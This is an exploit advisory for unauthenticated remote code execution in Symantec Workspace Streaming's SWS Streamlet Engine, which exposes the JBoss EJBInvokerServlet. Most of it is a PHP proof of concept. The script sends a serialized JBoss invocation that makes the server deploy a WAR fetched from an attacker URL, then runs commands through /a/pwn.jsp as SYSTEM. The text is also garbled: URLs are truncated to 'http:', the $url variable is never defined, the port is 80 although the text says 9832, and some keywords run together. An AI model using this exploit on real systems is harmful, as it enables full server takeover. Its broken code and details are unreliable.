Symantec Workspace Streaming 7.5.0.493 - SWS Streamlet Engine Invoker Servlets Remote Code Execution
  
 tested against: Microsoft Windows Server 2008 R2 sp1 
 download url: http:
 file tested: Symantec_Workspace_Streaming_7.5.0.493.zip 
  
 vulnerability: 
the "SWS Streamlet Engine" service (as_ste.exe), listening
on public TCP port 9832 (HTTP), is vulnerable.
It exposes the following servlets
 http:
 http:
because the JBoss invoker.sar (which provides the EJBInvokerServlet used below) is bundled with the service and reachable without authentication — the proof of concept sends no credentials at all.
The result is remote code execution with NT AUTHORITY\SYSTEM privileges: the serialized MarshalledInvocation built by the proof of concept below calls the `deploy` operation of the `jboss.system:service=MainDeployer` MBean with an attacker-supplied URL, so the server is made to deploy an arbitrary WAR, and the JSP inside it (requested afterwards as /a/pwn.jsp?cmd=...) runs the attacker's command.
  
 proof of concept url: 
 http:
  
proof of concept (PHP; run as: php &lt;script&gt; &lt;host&gt; &lt;command&gt;):
  
 <?php 
  
  
  
  
  
  
  
  
  
 $host=$argv[1]; 
 $cmd=$argv[2]; 
 $port=80; 
  
  
  
 $url_len=pack("n",strlen($url)); 
  
 functionhex_dump($data, $newline="\n") {  
 static$from= '';    
 static$to= '';     
 static$width= 16; static$pad= '.';   
  if($from==='')   {      
      for($i=0; $i<=0xFF; $i++)  {  
          $from.= chr($i);        
          $to.= ($i>= 0x20 && $i<= 0x7E) ? chr($i) : $pad;    
      }    
  }     
 $hex= str_split(bin2hex($data), $width*2);    
 $chars= str_split(strtr($data, $from, $to), $width);     
 $offset= 0;    
 foreach($hexas$i=> $line)   {      
     echosprintf('%6X',$offset).' : '.implode(' ', str_split($line,2)) . ' ['. $chars[$i] . ']'. $newline;     
    $offset+= $width;    
   }  
 }  
  
 $frag_i= 
 "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73". 
 "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72". 
 "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f". 
 "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77". 
 "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76". 
 "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2". 
 "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75". 
 "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e". 
 "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00". 
 "\x78\x70\x26\x95\xbe\x0a\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62". 
 "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d". 
 "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc". 
 "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x77"; 
  
 $frag_ii="\x00"; 
  
 $frag_iii= 
 "\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e".     
 "\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f". 
 "\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04\x73\x72\x00". 
 "\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e". 
 "\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b". 
 "\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62\x6f\x73". 
 "\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69\x63\x65". 
 "\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78\x74\x00". 
 "\x06\x64\x65\x70\x6c\x6f\x79\x75\x71\x00\x7e\x00\x00\x00\x00\x00". 
 "\x01\x74". 
 $url_len. 
 $url. 
 "\x75\x72\x00". 
 "\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61".                         
 "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d". 
 "\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x10\x6a\x61". 
 "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67"; 
  
 $frag_iv= 
 "\x0d\xd3".  
 "\xbe\xc9\x78\x77\x04\x00\x00\x00\x01\x73\x72\x00\x22\x6f\x72\x67". 
 "\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f". 
 "\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x4b\x65\x79\xb8". 
 "\xfb\x72\x84\xd7\x93\x85\xf9\x02\x00\x01\x49\x00\x07\x6f\x72\x64". 
 "\x69\x6e\x61\x6c\x78\x70\x00\x00\x00\x05\x73\x71\x00\x7e\x00\x05". 
 "\x77\x0d\x00\x00\x00\x05\xac\xed\x00\x05\x70\xfb\x57\xa7\xaa\x78". 
 "\x77\x04\x00\x00\x00\x03\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x04". 
 "\x73\x72\x00\x23\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69\x6e". 
 "\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61\x74". 
 "\x69\x6f\x6e\x54\x79\x70\x65\x59\xa7\x3a\x1c\xa5\x2b\x7c\xbf\x02". 
 "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00". 
 "\x00\x01\x73\x71\x00\x7e\x00\x07\x00\x00\x00\x0a\x70\x74\x00\x0f". 
 "\x4a\x4d\x58\x5f\x4f\x42\x4a\x45\x43\x54\x5f\x4e\x41\x4d\x45\x73". 
 "\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65\x6d". 
 "\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f\x03". 
 "\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x21\x6a\x62". 
 "\x6f\x73\x73\x2e\x73\x79\x73\x74\x65\x6d\x3a\x73\x65\x72\x76\x69". 
 "\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65\x70\x6c\x6f\x79\x65\x72\x78". 
 "\x78";                                                             
  
 $data=$frag_i.pack("v",strlen($frag_iii)+8).$frag_ii.pack("n",strlen($frag_iii)).$frag_iii.$frag_iv; 
  
  
 $pk="POST /invoker/EJBInvokerServlet/ HTTP/1.1\r\n". 
     "ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation\r\n". 
     "Accept-Encoding: x-gzip,x-deflate,gzip,deflate\r\n". 
     "User-Agent: Java/1.6.0_21\r\n". 
     "Host: ".$host.":".$port."\r\n". 
     "Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\r\n". 
     "Connection: keep-alive\r\n". 
     "Content-type: application/x-www-form-urlencoded\r\n". 
     "Content-Length: ".strlen($data)."\r\n\r\n". 
     $data; 
 echohex_dump($pk)."\n"; 
 $fp=fsockopen($host,$port,$e,$err,3); 
 fputs($fp,$pk); 
 $out=fread($fp,8192); 
 fclose($fp); 
 echohex_dump($out)."\n"; 
  
 sleep(5); 
  
 $pk="GET /a/pwn.jsp?cmd=".urlencode($cmd)." HTTP/1.0\r\n". 
     "Host: ".$host.":".$port."\r\n". 
     "Connection: Close\r\n\r\n"; 
  
 echohex_dump($pk)."\n"; 
 $fp=fsockopen($host,$port,$e,$err,3); 
 fputs($fp,$pk); 
 $out=""; 
 while(!feof($fp)) { 
 $out.=fread($fp,8192); 
 } 
 fclose($fp); 
 echo$out; 
 ?> 
 